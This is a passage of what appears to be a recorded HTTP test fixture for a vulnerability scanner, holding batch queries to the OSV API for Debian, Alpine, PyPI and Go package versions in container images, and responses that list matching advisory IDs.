"readline" }, "version": "7.0-5" }, { "package": { "ecosystem": "Debian:10", "name": "libseccomp" }, "version": "2.3.3-4" }, { "package": { "ecosystem": "Debian:10", "name": "libselinux" }, "version": "2.8-1+b1" }, { "package": { "ecosystem": "Debian:10", "name": "libsemanage" }, "version": "2.8-2" }, { "package": { "ecosystem": "Debian:10", "name": "libsemanage" }, "version": "2.8-2" }, { "package": { "ecosystem": "Debian:10", "name": "libsepol" }, "version": "2.8-1" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "sqlite3" }, "version": "3.27.2-3+deb10u2" }, { "package": { "ecosystem": "Debian:10", "name": "e2fsprogs" }, "version": "1.44.5-1+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "openssl" }, "version": "1.1.1n-0+deb10u5" }, { "package": { "ecosystem": "Debian:10", "name": "gcc-8" }, "version": "8.3.0-6" }, { "package": { "ecosystem": "Debian:10", "name": "systemd" }, "version": "241-7~deb10u9" }, { "package": { "ecosystem": "Debian:10", "name": "libtasn1-6" }, "version": "4.13-3+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "ncurses" }, "version": "6.1+20181013-2+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "systemd" }, "version": "241-7~deb10u9" }, { "package": { "ecosystem": "Debian:10", "name": "libunistring" }, "version": "0.9.10-1" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "libzstd" }, "version": "1.3.8+dfsg-3+deb10u2" }, { "package": { "ecosystem": "Debian:10", "name": "shadow" }, "version": "1:4.5-1.1" }, { "package": { "ecosystem": "Debian:10", "name": "mawk" }, "version": "1.3.3-17+b3" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "ncurses" }, "version": "6.1+20181013-2+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "ncurses" }, "version": "6.1+20181013-2+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "netbase" }, "version": "5.6" }, { "package": { "ecosystem": "Debian:10", "name": "openssl" }, "version": "1.1.1n-0+deb10u5" }, { "package": { "ecosystem": "Debian:10", "name": "shadow" }, "version": "1:4.5-1.1" }, { "package": { "ecosystem": "Debian:10", "name": "perl" }, "version": "5.28.1-6+deb10u1" }, { "package": { "ecosystem": "PyPI", "name": "pip" }, "version": "23.0.1" }, { "package": { "ecosystem": "PyPI", "name": "pip" }, "version": "23.0.1" }, { "package": { "ecosystem": "Debian:10", "name": "readline" }, "version": "7.0-5" }, { "package": { "ecosystem": "Debian:10", "name": "sed" }, "version": "4.7-1" }, { "package": { "ecosystem": "PyPI", "name": "setuptools" }, "version": "58.1.0" }, { "package": { "ecosystem": "PyPI", "name": "setuptools" }, "version": "58.1.0" }, { "package": { "ecosystem": "Debian:10", "name": "sysvinit" }, "version": "2.93-8" }, { "package": { "ecosystem": "Debian:10", "name": "tar" }, "version": "1.30+dfsg-6" }, { "package": { "ecosystem": "Debian:10", "name": "tzdata" }, "version": "2021a-0+deb10u11" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "PyPI", "name": "wheel" }, "version": "0.40.0" }, { "package": { "ecosystem": "Debian:10", "name": "zlib" }, "version": "1:1.2.11.dfsg-1+deb10u2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage/Scanning_python_image_with_no_packages url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 3752 body: | { "results": [ {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3482-1", "modified": "2025-05-26T07:01:25.263124Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, {}, { "vulns": [ { "id": "DLA-3807-1", "modified": "2026-03-09T01:21:14.798998Z" }, { "id": "DLA-3850-1", "modified": "2026-03-09T01:19:52.798152Z" } ] }, { "vulns": [ { "id": "DLA-3807-1", "modified": "2026-03-09T01:21:14.798998Z" }, { "id": "DLA-3850-1", "modified": "2026-03-09T01:19:52.798152Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3783-1", "modified": "2026-03-09T01:21:52.762023Z" } ] }, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3660-1", "modified": "2026-03-09T02:10:14.556560Z" }, { "id": "DLA-3740-1", "modified": "2026-03-09T01:23:17.775568Z" } ] }, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, { "vulns": [ { "id": "DLA-3586-1", "modified": "2026-03-09T01:19:25.252973Z" }, { "id": "DLA-3682-1", "modified": "2026-03-09T01:18:42.667623Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, {}, {}, { "vulns": [ { "id": "DLA-3530-1", "modified": "2026-03-09T01:19:28.929204Z" } ] }, {}, { "vulns": [ { "id": "DLA-3474-1", "modified": "2026-03-09T01:20:13.950328Z" } ] }, {}, { "vulns": [ { "id": "DLA-3586-1", "modified": "2026-03-09T01:19:25.252973Z" }, { "id": "DLA-3682-1", "modified": "2026-03-09T01:18:42.667623Z" } ] }, { "vulns": [ { "id": "DLA-3474-1", "modified": "2026-03-09T01:20:13.950328Z" } ] }, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, { "vulns": [ { "id": "DLA-3586-1", "modified": "2026-03-09T01:19:25.252973Z" }, { "id": "DLA-3682-1", "modified": "2026-03-09T01:18:42.667623Z" } ] }, { "vulns": [ { "id": "DLA-3586-1", "modified": "2026-03-09T01:19:25.252973Z" }, { "id": "DLA-3682-1", "modified": "2026-03-09T01:18:42.667623Z" } ] }, {}, { "vulns": [ { "id": "DLA-3530-1", "modified": "2026-03-09T01:19:28.929204Z" } ] }, {}, {}, { "vulns": [ { "id": "GHSA-4xh5-x5gv-qwph", "modified": "2026-02-04T03:47:34.542520Z" }, { "id": "GHSA-6vgw-5pg2-w6jp", "modified": "2026-02-16T17:11:10.097207Z" }, { "id": "GHSA-mq26-g339-26xf", "modified": "2026-02-04T02:57:26.696931Z" }, { "id": "PYSEC-2023-228", "modified": "2023-12-06T01:03:17.199012Z" } ] }, { "vulns": [ { "id": "GHSA-4xh5-x5gv-qwph", "modified": "2026-02-04T03:47:34.542520Z" }, { "id": "GHSA-6vgw-5pg2-w6jp", "modified": "2026-02-16T17:11:10.097207Z" }, { "id": "GHSA-mq26-g339-26xf", "modified": "2026-02-04T02:57:26.696931Z" }, { "id": "PYSEC-2023-228", "modified": "2023-12-06T01:03:17.199012Z" } ] }, {}, {}, { "vulns": [ { "id": "GHSA-5rjg-fvgr-3xxf", "modified": "2026-02-05T09:18:37.263234Z" }, { "id": "GHSA-cx63-2mw6-8hw5", "modified": "2026-02-04T03:54:02.259111Z" }, { "id": "GHSA-r9hx-vwmv-q579", "modified": "2026-02-04T03:03:25.892107Z" }, { "id": "PYSEC-2022-43012", "modified": "2023-12-06T01:02:35.662444Z" }, { "id": "PYSEC-2025-49", "modified": "2025-06-13T06:59:23.470501Z" } ] }, { "vulns": [ { "id": "GHSA-5rjg-fvgr-3xxf", "modified": "2026-02-05T09:18:37.263234Z" }, { "id": "GHSA-cx63-2mw6-8hw5", "modified": "2026-02-04T03:54:02.259111Z" }, { "id": "GHSA-r9hx-vwmv-q579", "modified": "2026-02-04T03:03:25.892107Z" }, { "id": "PYSEC-2022-43012", "modified": "2023-12-06T01:02:35.662444Z" }, { "id": "PYSEC-2025-49", "modified": "2025-06-13T06:59:23.470501Z" } ] }, {}, { "vulns": [ { "id": "DLA-3755-1", "modified": "2026-03-09T01:18:04.185679Z" } ] }, { "vulns": [ { "id": "DLA-3684-1", "modified": "2025-05-26T07:01:38.953691Z" }, { "id": "DLA-3788-1", "modified": "2025-05-26T07:01:46.700929Z" } ] }, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, { "vulns": [ { "id": "GHSA-8rrh-rw8j-w5fx", "modified": "2026-02-04T03:06:55.268134Z" } ] }, {} ] } headers: Content-Length: - "3752" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 14537 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "PyPI", "name": "django" }, "version": "1.11.29" }, { "package": { "ecosystem": "PyPI", "name": "flask" }, "version": "0.12.2" }, { "package": { "ecosystem": "PyPI", "name": "jinja2" }, "version": "3.1.6" }, { "package": { "ecosystem": "PyPI", "name": "markupsafe" }, "version": "3.0.3" }, { "package": { "ecosystem": "PyPI", "name": "werkzeug" }, "version": "3.1.4" }, { "package": { "ecosystem": "Debian:10", "name": "adduser" }, "version": "3.118" }, { "package": { "ecosystem": "Debian:10", "name": "apt" }, "version": "1.8.2.3" }, { "package": { "ecosystem": "Debian:10", "name": "base-files" }, "version": "10.3+deb10u13" }, { "package": { "ecosystem": "Debian:10", "name": "base-passwd" }, "version": "3.5.46" }, { "package": { "ecosystem": "Debian:10", "name": "bash" }, "version": "5.0-4" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "1:2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "ca-certificates" }, "version": "20200601~deb10u2" }, { "package": { "ecosystem": "PyPI", "name": "certifi" }, "version": "2025.11.12" }, { "package": { "ecosystem": "PyPI", "name": "chardet" }, "version": "3.0.4" }, { "package": { "ecosystem": "PyPI", "name": "click" }, "version": "8.1.8" }, { "package": { "ecosystem": "Debian:10", "name": "coreutils" }, "version": "8.30-3" }, { "package": { "ecosystem": "Debian:10", "name": "dash" }, "version": "0.5.10.2-5" }, { "package": { "ecosystem": "Debian:10", "name": "debconf" }, "version": "1.5.71+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "debian-archive-keyring" }, "version": "2019.1+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "debianutils" }, "version": "4.8.6.1" }, { "package": { "ecosystem": "Debian:10", "name": "diffutils" }, "version": "1:3.7-3" }, { "package": { "ecosystem": "Debian:10", "name": "dpkg" }, "version": "1.19.8" }, { "package": { "ecosystem": "Debian:10", "name": "e2fsprogs" }, "version": "1.44.5-1+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "findutils" }, "version": "4.6.0+git+20190209-2" }, { "package": { "ecosystem": "Debian:10", "name": "gcc-8" }, "version": "8.3.0-6" }, { "package": { "ecosystem": "Debian:10", "name": "gnupg2" }, "version": "2.2.12-1+deb10u2" }, { "package": { "ecosystem": "Debian:10", "name": "grep" }, "version": "3.3-1" }, { "package": { "ecosystem": "Debian:10", "name": "gzip" }, "version": "1.9-3+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "hostname" }, "version": "3.21" }, { "package": { "ecosystem": "PyPI", "name": "idna" }, "version": "2.7" }, { "package": { "ecosystem": "Debian:10", "name": "init-system-helpers" }, "version": "1.56+nmu1" }, { "package": { "ecosystem": "PyPI", "name": "itsdangerous" }, "version": "2.2.0" }, { "package": { "ecosystem": "Debian:10", "name": "acl" }, "version": "2.2.53-4" }, { "package": { "ecosystem": "Debian:10", "name": "apt" }, "version": "1.8.2.3" }, { "package": { "ecosystem": "Debian:10", "name": "attr" }, "version": "1:2.4.48-4" }, { "package": { "ecosystem": "Debian:10", "name": "audit" }, "version": "1:2.8.4-3" }, { "package": { "ecosystem": "Debian:10", "name": "audit" }, "version": "1:2.8.4-3" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "bzip2" }, "version": "1.0.6-9.2~deb10u2" }, { "package": { "ecosystem": "Debian:10", "name": "glibc" }, "version": "2.28-10+deb10u2" }, { "package": { "ecosystem": "Debian:10", "name": "glibc" }, "version": "2.28-10+deb10u2" }, { "package": { "ecosystem": "Debian:10", "name": "libcap-ng" }, "version": "0.7.9-2" }, { "package": { "ecosystem": "Debian:10", "name": "e2fsprogs" }, "version": "1.44.5-1+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "db5.3" }, "version": "5.3.28+dfsg1-0.5" }, { "package": { "ecosystem": "Debian:10", "name": "cdebconf" }, "version": "0.249" }, { "package": { "ecosystem": "Debian:10", "name": "expat" }, "version": "2.2.6-2+deb10u6" }, { "package": { "ecosystem": "Debian:10", "name": "e2fsprogs" }, "version": "1.44.5-1+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "libffi" }, "version": "3.2.1-9" }, { "package": { "ecosystem": "Debian:10", "name": "gcc-8" }, "version": "1:8.3.0-6" }, { "package": { "ecosystem": "Debian:10", "name": "libgcrypt20" }, "version": "1.8.4-5+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "gdbm" }, "version": "1.18.1-4" }, { "package": { "ecosystem": "Debian:10", "name": "gmp" }, "version": "2:6.1.2+dfsg-4+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "gnutls28" }, "version": "3.6.7-4+deb10u10" }, { "package": { "ecosystem": "Debian:10", "name": "libgpg-error" }, "version": "1.35-1" }, { "package": { "ecosystem": "Debian:10", "name": "nettle" }, "version": "3.4.1-1+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "libidn2" }, "version": "2.0.5-1+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "lz4" }, "version": "1.8.3-1+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "xz-utils" }, "version": "5.2.4-1+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "ncurses" }, "version": "6.1+20181013-2+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "nettle" }, "version": "3.4.1-1+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "p11-kit" }, "version": "0.23.15-2+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "pam" }, "version": "1.3.1-5" }, { "package": { "ecosystem": "Debian:10", "name": "pam" }, "version": "1.3.1-5" }, { "package": { "ecosystem": "Debian:10", "name": "pam" }, "version": "1.3.1-5" }, { "package": { "ecosystem": "Debian:10", "name": "pam" }, "version": "1.3.1-5" }, { "package": { "ecosystem": "Debian:10", "name": "pcre3" }, "version": "2:8.39-12" }, { "package": { "ecosystem": "Debian:10", "name": "readline" }, "version": "7.0-5" }, { "package": { "ecosystem": "Debian:10", "name": "libseccomp" }, "version": "2.3.3-4" }, { "package": { "ecosystem": "Debian:10", "name": "libselinux" }, "version": "2.8-1+b1" }, { "package": { "ecosystem": "Debian:10", "name": "libsemanage" }, "version": "2.8-2" }, { "package": { "ecosystem": "Debian:10", "name": "libsemanage" }, "version": "2.8-2" }, { "package": { "ecosystem": "Debian:10", "name": "libsepol" }, "version": "2.8-1" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "sqlite3" }, "version": "3.27.2-3+deb10u2" }, { "package": { "ecosystem": "Debian:10", "name": "e2fsprogs" }, "version": "1.44.5-1+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "openssl" }, "version": "1.1.1n-0+deb10u5" }, { "package": { "ecosystem": "Debian:10", "name": "gcc-8" }, "version": "8.3.0-6" }, { "package": { "ecosystem": "Debian:10", "name": "systemd" }, "version": "241-7~deb10u9" }, { "package": { "ecosystem": "Debian:10", "name": "libtasn1-6" }, "version": "4.13-3+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "ncurses" }, "version": "6.1+20181013-2+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "systemd" }, "version": "241-7~deb10u9" }, { "package": { "ecosystem": "Debian:10", "name": "libunistring" }, "version": "0.9.10-1" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "libzstd" }, "version": "1.3.8+dfsg-3+deb10u2" }, { "package": { "ecosystem": "Debian:10", "name": "shadow" }, "version": "1:4.5-1.1" }, { "package": { "ecosystem": "Debian:10", "name": "mawk" }, "version": "1.3.3-17+b3" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "ncurses" }, "version": "6.1+20181013-2+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "ncurses" }, "version": "6.1+20181013-2+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "netbase" }, "version": "5.6" }, { "package": { "ecosystem": "Debian:10", "name": "openssl" }, "version": "1.1.1n-0+deb10u5" }, { "package": { "ecosystem": "Debian:10", "name": "shadow" }, "version": "1:4.5-1.1" }, { "package": { "ecosystem": "Debian:10", "name": "perl" }, "version": "5.28.1-6+deb10u1" }, { "package": { "ecosystem": "PyPI", "name": "pip" }, "version": "23.0.1" }, { "package": { "ecosystem": "PyPI", "name": "pip" }, "version": "23.0.1" }, { "package": { "ecosystem": "PyPI", "name": "pytz" }, "version": "2025.2" }, { "package": { "ecosystem": "Debian:10", "name": "readline" }, "version": "7.0-5" }, { "package": { "ecosystem": "PyPI", "name": "requests" }, "version": "2.20.0" }, { "package": { "ecosystem": "Debian:10", "name": "sed" }, "version": "4.7-1" }, { "package": { "ecosystem": "PyPI", "name": "setuptools" }, "version": "58.1.0" }, { "package": { "ecosystem": "PyPI", "name": "setuptools" }, "version": "58.1.0" }, { "package": { "ecosystem": "Debian:10", "name": "sysvinit" }, "version": "2.93-8" }, { "package": { "ecosystem": "Debian:10", "name": "tar" }, "version": "1.30+dfsg-6" }, { "package": { "ecosystem": "Debian:10", "name": "tzdata" }, "version": "2021a-0+deb10u11" }, { "package": { "ecosystem": "PyPI", "name": "urllib3" }, "version": "1.24.3" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "PyPI", "name": "wheel" }, "version": "0.40.0" }, { "package": { "ecosystem": "Debian:10", "name": "zlib" }, "version": "1:1.2.11.dfsg-1+deb10u2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage/Scanning_python_image_with_some_packages url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 6240 body: | { "results": [ { "vulns": [ { "id": "GHSA-68w8-qjq3-2gfm", "modified": "2024-09-20T15:46:52.557962Z" }, { "id": "GHSA-6w2r-r2m5-xq5w", "modified": "2026-02-04T04:00:06.061990Z" }, { "id": "GHSA-7xr5-9hcq-chf9", "modified": "2026-02-04T03:48:05.224740Z" }, { "id": "GHSA-8x94-hmjh-97hq", "modified": "2026-02-04T02:45:55.690257Z" }, { "id": "GHSA-frmv-pr5f-9mcr", "modified": "2025-11-27T09:10:30.649595Z" }, { "id": "GHSA-qw25-v68c-qjf3", "modified": "2026-02-04T04:08:30.303132Z" }, { "id": "GHSA-rrqc-c2jx-6jgv", "modified": "2024-10-30T19:23:59.139649Z" }, { "id": "PYSEC-2021-98", "modified": "2023-12-06T01:01:16.755410Z" } ] }, { "vulns": [ { "id": "GHSA-562c-5r94-xh97", "modified": "2025-02-21T05:29:40.872529Z" }, { "id": "GHSA-5wv5-4vpf-pj6m", "modified": "2024-09-20T21:24:25.140560Z" }, { "id": "GHSA-68rp-wp8r-4726", "modified": "2026-02-23T23:43:45.778179Z" }, { "id": "GHSA-m2qf-hxjv-5gpq", "modified": "2025-02-21T05:42:17.337040Z" }, { "id": "PYSEC-2018-66", "modified": "2023-11-08T03:59:39.887416Z" }, { "id": "PYSEC-2019-179", "modified": "2023-11-08T04:00:40.602062Z" }, { "id": "PYSEC-2023-62", "modified": "2023-11-08T04:12:28.231927Z" } ] }, {}, {}, { "vulns": [ { "id": "GHSA-29vq-49wr-vm6x", "modified": "2026-02-23T23:43:27.690386Z" }, { "id": "GHSA-87hc-h4r5-73f7", "modified": "2026-02-04T03:18:07.993642Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3482-1", "modified": "2025-05-26T07:01:25.263124Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "GHSA-jjg7-2v4v-x38h", "modified": "2026-02-04T03:49:45.087439Z" }, { "id": "PYSEC-2024-60", "modified": "2024-07-11T17:42:33.704488Z" } ] }, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, {}, { "vulns": [ { "id": "DLA-3807-1", "modified": "2026-03-09T01:21:14.798998Z" }, { "id": "DLA-3850-1", "modified": "2026-03-09T01:19:52.798152Z" } ] }, { "vulns": [ { "id": "DLA-3807-1", "modified": "2026-03-09T01:21:14.798998Z" }, { "id": "DLA-3850-1", "modified": "2026-03-09T01:19:52.798152Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3783-1", "modified": "2026-03-09T01:21:52.762023Z" } ] }, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3660-1", "modified": "2026-03-09T02:10:14.556560Z" }, { "id": "DLA-3740-1", "modified": "2026-03-09T01:23:17.775568Z" } ] }, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, { "vulns": [ { "id": "DLA-3586-1", "modified": "2026-03-09T01:19:25.252973Z" }, { "id": "DLA-3682-1", "modified": "2026-03-09T01:18:42.667623Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, {}, {}, { "vulns": [ { "id": "DLA-3530-1", "modified": "2026-03-09T01:19:28.929204Z" } ] }, {}, { "vulns": [ { "id": "DLA-3474-1", "modified": "2026-03-09T01:20:13.950328Z" } ] }, {}, { "vulns": [ { "id": "DLA-3586-1", "modified": "2026-03-09T01:19:25.252973Z" }, { "id": "DLA-3682-1", "modified": "2026-03-09T01:18:42.667623Z" } ] }, { "vulns": [ { "id": "DLA-3474-1", "modified": "2026-03-09T01:20:13.950328Z" } ] }, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, { "vulns": [ { "id": "DLA-3586-1", "modified": "2026-03-09T01:19:25.252973Z" }, { "id": "DLA-3682-1", "modified": "2026-03-09T01:18:42.667623Z" } ] }, { "vulns": [ { "id": "DLA-3586-1", "modified": "2026-03-09T01:19:25.252973Z" }, { "id": "DLA-3682-1", "modified": "2026-03-09T01:18:42.667623Z" } ] }, {}, { "vulns": [ { "id": "DLA-3530-1", "modified": "2026-03-09T01:19:28.929204Z" } ] }, {}, {}, { "vulns": [ { "id": "GHSA-4xh5-x5gv-qwph", "modified": "2026-02-04T03:47:34.542520Z" }, { "id": "GHSA-6vgw-5pg2-w6jp", "modified": "2026-02-16T17:11:10.097207Z" }, { "id": "GHSA-mq26-g339-26xf", "modified": "2026-02-04T02:57:26.696931Z" }, { "id": "PYSEC-2023-228", "modified": "2023-12-06T01:03:17.199012Z" } ] }, { "vulns": [ { "id": "GHSA-4xh5-x5gv-qwph", "modified": "2026-02-04T03:47:34.542520Z" }, { "id": "GHSA-6vgw-5pg2-w6jp", "modified": "2026-02-16T17:11:10.097207Z" }, { "id": "GHSA-mq26-g339-26xf", "modified": "2026-02-04T02:57:26.696931Z" }, { "id": "PYSEC-2023-228", "modified": "2023-12-06T01:03:17.199012Z" } ] }, {}, {}, { "vulns": [ { "id": "GHSA-9hjg-9r4m-mvj7", "modified": "2026-02-04T03:44:00.676479Z" }, { "id": "GHSA-9wx4-h78v-vm56", "modified": "2026-02-04T02:43:42.271895Z" }, { "id": "GHSA-j8r2-6x86-q33q", "modified": "2026-02-04T03:34:13.807518Z" }, { "id": "PYSEC-2023-74", "modified": "2023-11-08T04:12:35.436175Z" } ] }, {}, { "vulns": [ { "id": "GHSA-5rjg-fvgr-3xxf", "modified": "2026-02-05T09:18:37.263234Z" }, { "id": "GHSA-cx63-2mw6-8hw5", "modified": "2026-02-04T03:54:02.259111Z" }, { "id": "GHSA-r9hx-vwmv-q579", "modified": "2026-02-04T03:03:25.892107Z" }, { "id": "PYSEC-2022-43012", "modified": "2023-12-06T01:02:35.662444Z" }, { "id": "PYSEC-2025-49", "modified": "2025-06-13T06:59:23.470501Z" } ] }, { "vulns": [ { "id": "GHSA-5rjg-fvgr-3xxf", "modified": "2026-02-05T09:18:37.263234Z" }, { "id": "GHSA-cx63-2mw6-8hw5", "modified": "2026-02-04T03:54:02.259111Z" }, { "id": "GHSA-r9hx-vwmv-q579", "modified": "2026-02-04T03:03:25.892107Z" }, { "id": "PYSEC-2022-43012", "modified": "2023-12-06T01:02:35.662444Z" }, { "id": "PYSEC-2025-49", "modified": "2025-06-13T06:59:23.470501Z" } ] }, {}, { "vulns": [ { "id": "DLA-3755-1", "modified": "2026-03-09T01:18:04.185679Z" } ] }, { "vulns": [ { "id": "DLA-3684-1", "modified": "2025-05-26T07:01:38.953691Z" }, { "id": "DLA-3788-1", "modified": "2025-05-26T07:01:46.700929Z" } ] }, { "vulns": [ { "id": "GHSA-2xpw-w6gg-jr37", "modified": "2026-02-04T02:36:12.983430Z" }, { "id": "GHSA-34jh-p97f-mpxf", "modified": "2026-02-04T03:37:44.850742Z" }, { "id": "GHSA-38jv-5279-wg99", "modified": "2026-02-04T03:51:36.162029Z" }, { "id": "GHSA-g4mx-q9vg-27p4", "modified": "2026-02-04T03:30:16.767903Z" }, { "id": "GHSA-gm62-xv2j-4w53", "modified": "2026-02-04T03:37:15.919661Z" }, { "id": "GHSA-pq67-6m6q-mj2v", "modified": "2026-02-04T04:38:01.163387Z" }, { "id": "GHSA-v845-jxx5-vc9f", "modified": "2026-02-04T02:58:30.152562Z" }, { "id": "GHSA-wqvq-5m8c-6g24", "modified": "2024-11-18T22:47:07.792720Z" }, { "id": "PYSEC-2020-148", "modified": "2023-11-08T04:03:14.251187Z" }, { "id": "PYSEC-2021-108", "modified": "2023-11-08T04:06:04.829992Z" }, { "id": "PYSEC-2023-192", "modified": "2023-11-08T04:13:33.452167Z" }, { "id": "PYSEC-2023-212", "modified": "2023-11-08T04:13:39.165450Z" } ] }, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, { "vulns": [ { "id": "GHSA-8rrh-rw8j-w5fx", "modified": "2026-02-04T03:06:55.268134Z" } ] }, {} ] } headers: Content-Length: - "6240" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 4149 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.20", "name": "alpine-baselayout" }, "version": "3.6.5-r0" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "alpine-baselayout" }, "version": "3.6.5-r0" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "apk-tools" }, "version": "2.14.4-r0" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "busybox" }, "version": "1.36.1-r29" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "busybox" }, "version": "1.36.1-r29" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "ca-certificates" }, "version": "20240226-r0" }, { "package": { "ecosystem": "Go", "name": "github.com/BurntSushi/toml" }, "version": "1.2.0" }, { "package": { "ecosystem": "Go", "name": "github.com/BurntSushi/toml" }, "version": "1.2.0" }, { "package": { "ecosystem": "Go", "name": "github.com/BurntSushi/toml" }, "version": "1.3.0" }, { "package": { "ecosystem": "Go", "name": "github.com/BurntSushi/toml" }, "version": "1.3.0" }, { "package": { "ecosystem": "Go", "name": "github.com/BurntSushi/toml" }, "version": "1.4.0" }, { "package": { "ecosystem": "Go", "name": "github.com/BurntSushi/toml" }, "version": "1.4.0" }, { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.22.4" }, { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.22.4" }, { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.22.4" }, { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.22.4" }, { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": 